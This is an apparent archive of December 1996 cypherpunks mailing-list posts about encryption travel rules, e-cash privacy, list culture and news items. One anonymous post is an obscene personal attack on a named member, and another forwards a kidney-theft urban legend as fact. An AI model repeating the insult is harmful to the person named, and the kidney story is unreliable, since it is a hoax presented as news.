supposition that we are bound to each other and are obligated to
maintain a relationship of some kind (as determined by the PC moral
'authorities').

The concepts are too involved to discuss the details on this list, but
the fact that individuals do not maintain a steady and predictable
course throughout their lifetime, or the lifetime of the projects which
they begin, is the very reason why your attempts at "fighting off the
decadence" are doomed:  the objects of your attention may not hang
around on the list long enough to be reformed.   

Remember the purpose of the list is discussion & information, not moral
rehabilitation (except as it clears the intellectual air regarding
privacy & potential crimes to humanity).  It could happen that some
decadent subscriber would "see the light" and behave themselves, but if
it does I expect it would be an indirect side-effect and the result of
their own desire to change their style & manners.

   ..
Blanc

>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Fri, 6 Dec 1996 12:59:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Proof that "cypher punks" have complete degenerated...
Message-ID: <19961206205919815.AAA172@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


>Dr.Dimitri Vulis KOTM (dlv@bwalk.dm.com) said something about Proof that 
"cypher punks" have complete degenerated... on or about 12/6/96 9:17 AM

>
>No one even commented on the latest Dr. Dobbs issue.


Oh? 

If you had something to follow up on my postings re: RIPEMD-160 and the Bozoki 
interview I didn't see them.


--j
-----------------------------------
| John Fricker (jfricker@vertexgroup.com)
| -random notes-
| My PGP public key is available by sending me mail with subject "send pgp key".
| www.Program.com is a good programmer web site.
-----------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Fri, 6 Dec 1996 04:07:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Decline of Science ?? (Was: Stinger Specs)
In-Reply-To: <199612060757.AAA23206@infowest.com>
Message-ID: <Pine.HPP.3.91.961206114031.14965A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Attila wrote:

> to participate. junior colleges are graduating students who
> would not have passed out of tenth grade 20-30 years ago.

<etc. about Gen 3 (-5) as in Tim's example>

Isn't this merely an effect of mass education instead of
elite_only education? And the peak performers will do as
well as they ever did? Doesn't every generation claim that
the younger people get defective education in some sense?
The Latin speakers of Gen 1 were horrified that Gen 2 didn't
get a thorough understanding of classic Greek culture and
geometry (but started with 'sets' and 'subsets' instead). 

Science is still exploding in electro-physics, digital
programming, molecular biology and several other fields.
(I wonder what is happening in Pure Math with No Applications
- not even for Cryptography :) - these days?) And formal
education is gradually loosing to actual competence.

A real difference, though, is the relative lack of multidisciplinary
theorists nowadays, I mean with a deep understanding of several
'unrelated' fields of knowledge. Most of us with actual competence
in a certain area are SUBspecialists. This is natural since the
knowledge bases have exploded to become impossible for any one man
or woman to comprehend. An industrial cobol programmer probably
doesn't know shit about Java (perhaps a bad example; I'm not
a programmer, but I know a guy who makes a good living off cobol!)
and a PCR biochemist hacking DNA doesn't know shit about immunology
or molecular neurology. In bio-science there is a discipline
which tries to put all such kinds of specialties into a broader
understanding of the human/animal body and soul - it's called
physiology, and is a declining field with chronic lack of funds;
not much money in it. I'm sure there is a comparable discipline
of computer science that I'm not able to name (information theory??),
with similar economic problems. But there is still hope for the GMAU
(Grand Meta-Analysis of the Universe); AltaVista is a new, good start
for collecting ingredients :-)


So, I'm not worried. When I indulge in the inevitable bashing of
younger generations I stick to their bade taste of music, like rap
and hip-hop (but some acid house/techno is ok), and appearance, like
tatoos and piercing, and life-style, like working-out, cliff-climbing
and resorting to vitamins, herbal medicine and other useless stuff.
(But even so, psychodelic drugs are making a come-back which I think
is a Good Thing.)


Asgaard (Gen 2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 6 Dec 1996 10:13:31 -0800 (PST)
To: cypherpunks@toad.com
Subject: stop annoying me
Message-ID: <199612061813.NAA21559@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Someone is sending me lots of requests, with forged from addresses,
asking that the cryptography mailing list sign up
"cypherpunks@toad.com" for the cryptography mailing list.

I'm obviously not going to do it. The only result repeated requests
will have is that I'll put in a regexp to filter all the mail with
these stupid requests.

In other words, stop. There is no point.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Fri, 6 Dec 1996 04:13:24 -0800 (PST)
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Stinger Specs
In-Reply-To: <3.0.32.19961205212336.006a520c@netcom14.netcom.com>
Message-ID: <199612061215.NAA12924@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:

> There is nothing like some real life challenges to spark a young person's
> mind. Today, conducting the experiments that fueled von Braun's imagination
> would be a felony. The mere posession of the chemicals he used in his early
> twenties is illegal.
> 
> This country has set out on a project to dumb the minds of its young. With
> great success.

Quite.  I once heard a comment that young pyrotechnicians (?) go on to become 
either great scientists or great lawyers, presumably due to their having to 
explain to their parents the reason for large clouds of smoke etc.

Gary





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hans "Unicorn" Van de Looy <hvdl@sequent.com>
Date: Fri, 6 Dec 1996 04:30:03 -0800 (PST)
To: se7en@dis.org
Subject: Re: Travelling With Laptops/PGP
In-Reply-To: <Pine.BSI.3.91.961205032955.685A-100000@kizmiaz.dis.org>
Message-ID: <9612061227.AA15287@amsqnt.nl.sequent.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi Se7en,

The one-and-only Evil se7en once stated:
! 
! Problem:
! 
! I will be spending a couple of months chilling out in Barcelona, Spain.
! I will have a local Internet account/dial-up in that city, and will use 
! it to telnet into my various US-based accounts. This is how I plan to 
! keep in touch with various people while I am gone.

No problem there...

! Questions:
! 
! 1 - Is the importation of two laptops and it's various peripheral devices 
! by a US citizen into Spain going to be a problem? I know it is in some 
! European countries.

Not as far as I know, but then again I'm no lawer...

! 2 - Will having PGP 2.6.2, with 2048-bit keys, or any key length for this 
! matter, installed on these two machines, cause a problem?

Why not bring the systems with  keyrings alone, and install 2.6.3ui when
you are actually in Spain?

! 3 - What about having SSH and ESM installed on the laptops? Will this set 
! off red flags as well?

The people  searching though your stuff  will most likely be  unaware of
any of these program's.  Just tell them  (if they ask) that you must use
it to  contact another computer,  just like  they would use  <insert any
DOS/Windoze  terminal emulator>.   When I  visited Rome  (I know  that's
Italy, but there is no big difference between these countries) I brought
my equipment, and it was never searched, although I was asked to boot-up
before entering the plane...

! Now, I see a work around if this is a problem, but would like advice on 
! this also:
! 
! If I generate a temporary PGP key, and distribute it prior to my departure,
! and then store it on the US-based server (not a good idea, but it is a 
! temporary key, and if it is not a problem in Spain, SSH and ESM would be in 
! use) then bouncing out of Spain via telnet into US-based computers to 
! process encryption/decryption, key management, etc, any encryption would 
! never actually take place on servers outside of the US. 

Why make live more difficult than it already is?

! Would this be a viable workaround? Or should I just say fuck it, and just 

I guess it  would be a viable  workaround, but I would still  go for the
international  version  of PGP.   For  once  I  could leave  some  stuff
encrypted on my system, just in case...

! disavow myself of any reason/need for PGP for the duration of my stay? If 
! this is gonna be a problem, I'll just forego anything requiring 
! encryption while I am in Spain.

Forget the  above, just use the  international version of PGP  while you
are in Europe, and reinstall the US version once you get back.

! I have no interest in smuggling crypto in, or defying international law 
! just to use PGP for personal use. If it's not allowed, I simply won't use 
! it. But, I MUST be able to bring my laptops into the country. That HAS to 
! happen.

See above.

! My Research: I tried to find these answers myself via conventioanl 
! methods, and either there was no information available, or the embassy 
! people I spoke to weren't sure. (Go figure!) So now I ask for your 
! opinions. 

Just my $0.02.

! se7en

Ciao,
Hans.
-- 
==== _ __,;;;/ TimeWaster on http://www.IAEhv.nl/users/hvdl ============
  ,;( )_, )~\| Hans "Unicorn" Van de Looy   PGP: ED FE 42 22 95 44 25 D8
 ;; //  `--;   GSM: +31 653 261 368              BD F1 55 AA 04 12 44 54
'= ;\ = | ==== finger hvdl@sequent.com for more info ===================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Benjamin Grosman <bgrosman@healey.com.au>
Date: Thu, 5 Dec 1996 19:27:07 -0800 (PST)
To: cypherpunks@toad.com
Subject: Encryption/data-changing in russia
Message-ID: <2.2.32.19961207002348.00874dcc@healey.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear All,

whilst on the subject of PGP in Russia, I encountered something very
interesting. A friend of mine who is Russian, but lives out here, frequently
corresponds with friends in Russia via email, and in the course of sending
emai, they occasionally send an attachment. However, the attachment that
_all_ his russian friends send, including the ones who use MIME capable
email clients such as Eudora, always, _always_, uuencode files, and they say
they can't do MIME. I am wondering if the encryption/data-changing laws in
Russia are so strict as to disallow MIME encoding even, but still allows UU
for some reason?

Any clues as to this?

Yours Sincerely,

Benjamin Grosman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 6 Dec 1996 14:44:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Law crosses speed bumps
Message-ID: <199612062235.OAA22930@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



FTC News Release

FTC TO DISTRIBUTE NEARLY $338,000 TO VICTIMS OF HIGH-TECH FRAUD 
FOLLOWING SETTLEMENT:

                     Funds to be Retrieved from Bahamas

  In a case that will mark the first time the U.S. government has
  obtained an asset freeze issued by a foreign court and returned the
  frozen funds to American telemarketing fraud victims, the Federal Trade
  Commission today announced that consumers victimized by a fraudulent
  paging license application mill will share $337,780 out of funds that a
  defendant in an FTC case allegedly diverted to a Bahamian bank. The
  defendant is Robert Corey (also known as Michael Allen), who was a
  hidden principal in a company called On Line Communications, Inc. that,
  while headquartered in Las Vegas, Nevada, actually conducted business
  out of Los Angeles. The FTC charged the firm and its principals in
  January with making false claims to investors about the nature and
  value of the paging licenses it could obtain for them. Corey has agreed
  to disgorge a total of $362,500, of which $337,780 is for the refund
  pool, as part of a settlement that will end the FTC litigation against
  him. The FTC said it has been working with such agencies as the
  Securities and Exchange Commission, the Commodity Futures Trading
  Commission and the Justice Department to return funds hidden in
  overseas banks to American fraud victims, and this case is a successful
  example of that effort.

[Ed. Note:  Many details were snipped in length's best interest.
 If you'd like to receive a full-text copy of the 6K PR, send Email
 to:  liz@kersur.net  SUBJECT: FTC News Release ]

[BY: Capitol NewsWire-D.C. Bureau-Law Correspondent 
     <CapNwsWire@aol.com> ]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Fri, 6 Dec 1996 11:40:49 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Mondex
In-Reply-To: <Pine.SUN.3.94.961206110148.1568B-100000@polaris>
Message-ID: <Pine.SUN.3.95.961206144125.13965M-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


http://www.law.miami.edu/~froomkin/articles/oceanno.htm#xtocid583129
http://www.privacy.org/pi/activities/mondex/

On Fri, 6 Dec 1996, Black Unicorn wrote:

> 
> Can anyone briefly discuss the anonymity features (or lack thereof) for
> Mondex?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
** Away from Miami -- and at times from the 'net -- Dec. 12 to Jan. 8 **
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Fri, 6 Dec 1996 14:16:39 -0800 (PST)
To: "William H. Geiger III" <whgiii@amaranth.com>
Subject: Re: Strong-crypto smart cards in Singapore and Germany
In-Reply-To: <199611301740.LAA29497@mailhub.amaranth.com>
Message-ID: <Pine.SOL.3.91.961206145952.15685B-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Does anyone understand the implications of a society moving to an
> electroinc cash based system??
> 

Well, yes - or do you mean the implications for criminals?

> All trasactions will be recorded, moitored, tracked & analysed. This is
> not just the government that one has to worry about but corporations also.

First of all, a lot of that information is already available - we do use 
credit cards for virtually everything, and also, I doubt our spending 
habits will be readily available to anyone who asks...

> 
> Insurance industry:
> 
> - Gee Mr. Jones seems that you buy too much junk food & red meat. Our
> actuaries say this makes you a "high risk".
> 
> - Gee Ms. Smith you speend too much money at the bars. Our actuaries say
> you are a high risk for DUI & accidents. 

Well, if I were an insurance company, and I could get this data, I too 
would make these decisions - it makes good business sense - insurance 
isn't your right you know...


> 
> Company Employment:
> 
> - Gee Mr. Thompson you spend too much on beer & cigarettes. Oh yes we
> don't like the magizines you read either.
> 

That would suck, but really, how is everyone in the world going to get 
this information?

> IRS:
> 
> - Well, well, well Mr & Ms Washington our records show that you spent
> $50,000 last year but only declaired $35,000 care to explain where the
> extra money came from??

Hmmmm.....why exactly would one declare less than they made?  If you 
don't agree with the tax system, use your democratic voice to change it 
OR get out.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Fri, 6 Dec 1996 13:35:51 -0800 (PST)
To: gary@systemics.com (Gary Howland)
Subject: Re: Stinger Specs
In-Reply-To: <199612061215.NAA12924@internal-mail.systemics.com>
Message-ID: <199612062132.PAA13293@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Gary Howland wrote:
> 
> Lucky Green wrote:
> 
> > There is nothing like some real life challenges to spark a young person's
> > mind. Today, conducting the experiments that fueled von Braun's imagination
> > would be a felony. The mere posession of the chemicals he used in his early
> > twenties is illegal.
> > 
> > This country has set out on a project to dumb the minds of its young. With
> > great success.
> 
> Quite.  I once heard a comment that young pyrotechnicians (?) go on to become 
> either great scientists or great lawyers, presumably due to their having to 
> explain to their parents the reason for large clouds of smoke etc.
> 

or computer consultants

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Kozubik <kozubik@shoelace.FirstLink.com>
Date: Fri, 6 Dec 1996 15:03:35 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A11CFB.421@gte.net>
Message-ID: <Pine.SOL.3.91.961206160209.15685C-100000@shoelace.FirstLink.com>
MIME-Version: 1.0
Content-Type: text/plain


you were speaking of human rights, and the issue of Bush being Knighted 
... just out of curiousity, why is it against the constitution for Bush 
to be Knighted??

Thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Fri, 6 Dec 1996 15:45:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: Elliptic curves
Message-ID: <199612062345.QAA11915@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


The arrival of warm weather is heralded by the 
pig shit (or whatever kind of shit Intel swines 
have for brains) getting soft in Timothy C[unt] 
May's mini-cranium and the resulting green 
slime seeping through key cocaine- and 
syphilis- damaged nose and onto his keyboard.

    ^ ^
   (o o) Timothy C[unt] May
    ( )
   \___/
    !_!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Will Rodger <rodger@worldnet.att.net>
Date: Fri, 6 Dec 1996 13:51:22 -0800 (PST)
To: pam@intertrader.com>
Subject: Re: Aghast..
Message-ID: <3.0.32.19961206164801.006bf36c@postoffice.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain



Folks - just for the record - the Freeh summary was a CLEAR typo, or at
least vague in its meaning. Someone meant to say Freeh thought it was an
*alienable* right. So much for cute phraseology. 

Then again, anyone familiar with the numerous pieces we've run on crypto
would likely have guessed at our meaning. Sen. Conrad Burns, after all, was
#21 on our list.

 
>     I couldn't believe my eyes when reading through Inter@ctive Week's
> "The Driving Forces of Cyberspace" Top 25 list I saw that Louis J.
> Freeh, Director of the FBI received an Honorable Mention because of him
> supposedly believing that "Encryption is an inalienable right."  I
> suppose that isn't necessarily a lie, but it would need the word "Weak"
> added on to the front in order to qualify it.  Anyway, I was quite
> disappointed in seeing their poor choice of this candidate.

And yes, my face is at least as my hair, right now.......

Will Rodger
Washington Bureau Chief
Inter@ctive Week





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Butler, Scott" <SButler@chemson.com>
Date: Fri, 6 Dec 1996 07:50:21 -0800 (PST)
To: "'IMCEAX400-c=GB+3Ba=+20+3Bp=CHEMSON+3Bo=CSH+3Bdda+3ASMTP=cypherpunks+40toad+2Ecom+3B@chemson.com>
Subject: Gilmore / Logos
Message-ID: <c=GB%a=_%p=CHEMSON%l=CSH_NT0-961206155349Z-920@csa-ntx.chemson.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the spam, 

but does anyone know if it is true that John Gilmore and this Logos
character are the same person ?

Before you dismiss the idea, just think about it for a minute.

Cheers Scott
;-D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Fri, 6 Dec 1996 14:55:24 -0800 (PST)
To: Bovine Remailer <haystack@cow.net>
Subject: Re: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN
In-Reply-To: <9612062156.AA26710@cow.net>
Message-ID: <Pine.OSF.3.91.961206165346.25622B-100000@Joyce-Perkins.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



This sound like the movie Harvest that came out several years ago.

Dan



		Surf'n the singularity.

On Fri, 6 Dec 1996, Bovine Remailer wrote:

> | >>>  A friend of mine from UT passed this story onto me from the "Daily
> | >>>  Texan" - the University of Texas newspaper. Apparently it occured
> | >>>  during Fall Premier -- a UT tradition that is a celebration of the
> | >>>  end of midterms.
> | >>>
> | >>> >"Reason to not party anymore"-
> | >>> >
> | >>> >
> | >>> >This guy went out last Saturday night to a party.  He was having a
> | >>> >good time, had a couple  of beers and some girl seemed to like him
> | >>> >and invited him to go to another party.  He quickly agreed and
> | >decided
> | >>> >to go along with her.  She took him to a party in some apartment
> | >and
> | >>> >they continued to drink, and even got involved with some other
> | >drugs
> | >>> >(unknown which).
> | >>> >
> | >>> >The next thing he knew, he woke up completely naked in a bathtub
> | >>> >filled with ice.  He was still feeling the effects of the drugs,
> | >but
> | >>> >looked around to see he was alone.
> | >>> >
> | >>> >He looked down at his chest, which had "CALL 911 OR YOU WILL DIE"
> | >>> >written on it in lipstick.  He saw a phone was on a stand next to
> | >>> >the tub, so he picked it up and dialed.  He explained to the EMS
> | >>> >operator what the situation was and that he didn't know where he
> | >was,
> | >>> >what he took, or why he was really calling.  She advised him to get
> | >>> >out of the tub.  He did, and she asked him to look himself over in
> | >>> >the mirror.  He did, and appeared normal, so she told him to check
> | >>> >his back.  He did, only to find two 9 inch slits on his lower back.
> | >>> >She told him to get back in the tub immediately, and they sent a
> | >>> >rescue team over.
> | >>> >
> | >>> >Apparently, after being examined, he found out more of what had
> | >>> >happened.  His kidneys were stolen.  They are worth 10,000 dollars
> | >>> >each on the black market.  (I was unaware this even existed.)
> | >>> >Several guesses are in order:
> | >>> >The second party was a sham, the people involved had to be at least
> | >>> >medical students, and it was not just recreational drugs  he was
> | >>> >given.
> | >>> >
> | >>> >Regardless, he is currently in the  hospital on life  support,
> | >>> >awaiting a spare kidney. The University of Texas in conjunction
> | >>> >with Baylor University Medical Center is conducting tissue research
> | >>> >to match the sophomore student with a donor.
> | >>> >
> | >>> >Any information leading to the arrest of the individuals may be
> | >>> >forwarded to the University of Texas Campus police, or the Texas
> | >>> >Rangers.
> | >>> >
> | >>> >Kimm Antell, Editor of the Daily Texan
> | >>> >University of Texas at Austin
> | >>> >Mechanical Engineering, Graduate Office
> | >>> >
> | >>> >Phone:  (512) 471-7571
> | >>> >Voice:   (512) 475-9794
> | >>> >Fax:       (512) 471-8727
> | >>> >
> | >>> >
> | >>> --
> | >>>
> | >>> --------- End forwarded message ----------
> | >
> [5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Fri, 6 Dec 1996 14:10:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: KIDNEYS STOLEN FROM A NAKED DRUGGED MAN
Message-ID: <9612062156.AA26710@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


| >>>  A friend of mine from UT passed this story onto me from the "Daily
| >>>  Texan" - the University of Texas newspaper. Apparently it occured
| >>>  during Fall Premier -- a UT tradition that is a celebration of the
| >>>  end of midterms.
| >>>
| >>> >"Reason to not party anymore"-
| >>> >
| >>> >
| >>> >This guy went out last Saturday night to a party.  He was having a
| >>> >good time, had a couple  of beers and some girl seemed to like him
| >>> >and invited him to go to another party.  He quickly agreed and
| >decided
| >>> >to go along with her.  She took him to a party in some apartment
| >and
| >>> >they continued to drink, and even got involved with some other
| >drugs
| >>> >(unknown which).
| >>> >
| >>> >The next thing he knew, he woke up completely naked in a bathtub
| >>> >filled with ice.  He was still feeling the effects of the drugs,
| >but
| >>> >looked around to see he was alone.
| >>> >
| >>> >He looked down at his chest, which had "CALL 911 OR YOU WILL DIE"
| >>> >written on it in lipstick.  He saw a phone was on a stand next to
| >>> >the tub, so he picked it up and dialed.  He explained to the EMS
| >>> >operator what the situation was and that he didn't know where he
| >was,
| >>> >what he took, or why he was really calling.  She advised him to get
| >>> >out of the tub.  He did, and she asked him to look himself over in
| >>> >the mirror.  He did, and appeared normal, so she told him to check
| >>> >his back.  He did, only to find two 9 inch slits on his lower back.
| >>> >She told him to get back in the tub immediately, and they sent a
| >>> >rescue team over.
| >>> >
| >>> >Apparently, after being examined, he found out more of what had
| >>> >happened.  His kidneys were stolen.  They are worth 10,000 dollars
| >>> >each on the black market.  (I was unaware this even existed.)
| >>> >Several guesses are in order:
| >>> >The second party was a sham, the people involved had to be at least
| >>> >medical students, and it was not just recreational drugs  he was
| >>> >given.
| >>> >
| >>> >Regardless, he is currently in the  hospital on life  support,
| >>> >awaiting a spare kidney. The University of Texas in conjunction
| >>> >with Baylor University Medical Center is conducting tissue research
| >>> >to match the sophomore student with a donor.
| >>> >
| >>> >Any information leading to the arrest of the individuals may be
| >>> >forwarded to the University of Texas Campus police, or the Texas
| >>> >Rangers.
| >>> >
| >>> >Kimm Antell, Editor of the Daily Texan
| >>> >University of Texas at Austin
| >>> >Mechanical Engineering, Graduate Office
| >>> >
| >>> >Phone:  (512) 471-7571
| >>> >Voice:   (512) 475-9794
| >>> >Fax:       (512) 471-8727
| >>> >
| >>> >
| >>> --
| >>>
| >>> --------- End forwarded message ----------
| >
[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~[5~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Fri, 6 Dec 1996 16:57:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Please post Eudora PGP plugin URL
Message-ID: <3.0.32.19691231160000.0069f468@aa.net>
MIME-Version: 1.0
Content-Type: text/plain


Or Email it to me 


Thanks in advance





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Dec 1996 14:00:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Aghast..
Message-ID: <v0300781eaece47e6a331@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Sender: e$@thumper.vmeng.com
Reply-To: Will Rodger <rodger@worldnet.att.net>
Mime-Version: 1.0
Precedence: Bulk
Date: Fri, 06 Dec 1996 16:48:05 -0500
From: Will Rodger <rodger@worldnet.att.net>
To: Multiple recipients of <e$@thumper.vmeng.com>
Subject: Re: Aghast..


Folks - just for the record - the Freeh summary was a CLEAR typo, or at
least vague in its meaning. Someone meant to say Freeh thought it was an
*alienable* right. So much for cute phraseology.

Then again, anyone familiar with the numerous pieces we've run on crypto
would likely have guessed at our meaning. Sen. Conrad Burns, after all, was
#21 on our list.


>     I couldn't believe my eyes when reading through Inter@ctive Week's
> "The Driving Forces of Cyberspace" Top 25 list I saw that Louis J.
> Freeh, Director of the FBI received an Honorable Mention because of him
> supposedly believing that "Encryption is an inalienable right."  I
> suppose that isn't necessarily a lie, but it would need the word "Weak"
> added on to the front in order to qualify it.  Anyway, I was quite
> disappointed in seeing their poor choice of this candidate.

And yes, my face is at least as my hair, right now.......

Will Rodger
Washington Bureau Chief
Inter@ctive Week



--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gorkab@sanchez.com (Brian Gorka)
Date: Fri, 6 Dec 1996 14:11:27 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: CDA Again
Message-ID: <c=US%a=_%p=Sanchez_Computer%l=OZ-961206221102Z-7282@oz.sanchez.com>
MIME-Version: 1.0
Content-Type: text/plain


Supreme Court to hear Internet indecency case

December 6, 1996
Web posted at: 2:45 p.m. EST 

WASHINGTON (Reuter) -- The Supreme Court agreed Friday to hear a
landmark case on free-speech rights in cyberspace arising from a federal
law that effectively bans indecent material on the Internet global
computer network. 

http://www.cnn.com/US/9612/06/scotus.reut/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 6 Dec 1996 17:23:35 -0800 (PST)
To: "Asgaard" <cypherpunks@toad.com>
Subject: Re: Decline of Science ?? (Was: Stinger Specs)
Message-ID: <19961207012015890.AAD166@rn29.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Dec 1996 13:10:57 +0100 (MET), Asgaard wrote:

>> to participate. junior colleges are graduating students who
>> would not have passed out of tenth grade 20-30 years ago.
>
><etc. about Gen 3 (-5) as in Tim's example>
>
>Isn't this merely an effect of mass education instead of
>elite_only education? And the peak performers will do as
Not really; high schools have gotten worse -- it was amusing for me to read
Robert Heinlein's rant in the first chapters of "Have spacesuit..." because
the school he was complaining about would have been GOOD today.

>A real difference, though, is the relative lack of multidisciplinary
>theorists nowadays, I mean with a deep understanding of several
>'unrelated' fields of knowledge. Most of us with actual competence
>in a certain area are SUBspecialists. This is natural since the
>knowledge bases have exploded to become impossible for any one man
>or woman to comprehend. An industrial cobol programmer probably
>doesn't know shit about Java (perhaps a bad example; I'm not
>a programmer, but I know a guy who makes a good living off cobol!)
You aren't that far off - at our developer's conference most people didn't
know why Java was so hot.  Particularly funny since Acucobol users have been
getting that compile-once/run-anywhere ability for quite awhile.

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: musicblvd@n2k.com
Date: Fri, 6 Dec 1996 14:27:28 -0800 (PST)
Subject: Happy Holidays from Music Boulevard!
Message-ID: <199612062227.RAA09980@riker.telebase.com>
MIME-Version: 1.0
Content-Type: text/plain


Happy Holidays!
------------------------------------------------------
Check out all of the fun at: http://www.musicblvd.com
------------------------------------------------------

Now that we we are in the hectic holiday home stretch, here is what's
going on at Music Boulevard that will make your holiday shopping fast,
fun, and give you the best deals around.

Everything in the store is on sale now!  Just for a little while longer
every CD and cassette (more titles than you can shake a stick at!) is
reduced at least another 10% off of our everyday low price.

Our international (outside of the United States & Canada, that is)
shipping rates have been dramatically lowered! 
So, if you are over there, you have another reason to shop here.

This week's great gift ideas:

*Holiday music in for every musical taste.....
*Great Gift sets for everyone...
*A Monster list of "Greatest hits.....

Our Featured Sale Titles For The Week (at special low prices) are:
***   Pop/Rock        ***
Prince        -       "Emancipation" 3 CD Set only $24.99 
Enigma        -       "Enigma 3 - Le Roi Est Mort" $11.99
Bush  -               "Razorblade Suitcase" $11.99

***   Jazz            ***
Dianne Reeves -       "Grand Encounter" $11.99
Branford Marsalis -   "Dark Keys" $11.99
Pat Metheny Group -   "Quartet" $11.99

***   Classical       ***
Leonard Bernstein -   "New York Philharmonic Debut" $15.99
Pavarotti -           "War Child" $11.99
Yo Yo Ma -            "Appalachia Waltz" $11.99

***   Country         ***
Mark Chestnutt -      "Greatest Hits" $11.99
Alan Jackson -        "Everything I Love" $11.99
Reba McEntire -       "What If It's You" $11.99

***   Eclectic        ***
Julio Iglesias -      "Tango" $11.99
Soundtrack -          "Preacher's Wife" $11.99


Music Boulevard is located on the Internet at http://www.musicblvd.com.
 No traffic, no lines, no hassle - just tons of music.


Thanks for your continued support, and have a great holiday.

Neil Roseman
Manager, Music Boulevard
neil.roseman@n2k.com

/******************************************************************/
 * If you do not want to receive any more Music Boulevard mail    *
 * simply reply to this message with the word UNSUBSCRIBE in      *
 * the body of the mail.                                          *
/******************************************************************/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Kirksey <kkirksey@appstate.campus.mci.net>
Date: Fri, 6 Dec 1996 14:45:09 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: "Family Channel" of the Internet?
Message-ID: <199612062239.RAA26100@aus-c.mp.campus.mci.net>
MIME-Version: 1.0
Content-Type: text/plain


I had a rather interesting conversation today with a man who works for an 
individual who is getting into the ISP business. The guy freely admitted 
that he was not a technical kind of guy, and was only repeating what he 
had been told.  The gist of the conversation:  this company was going to 
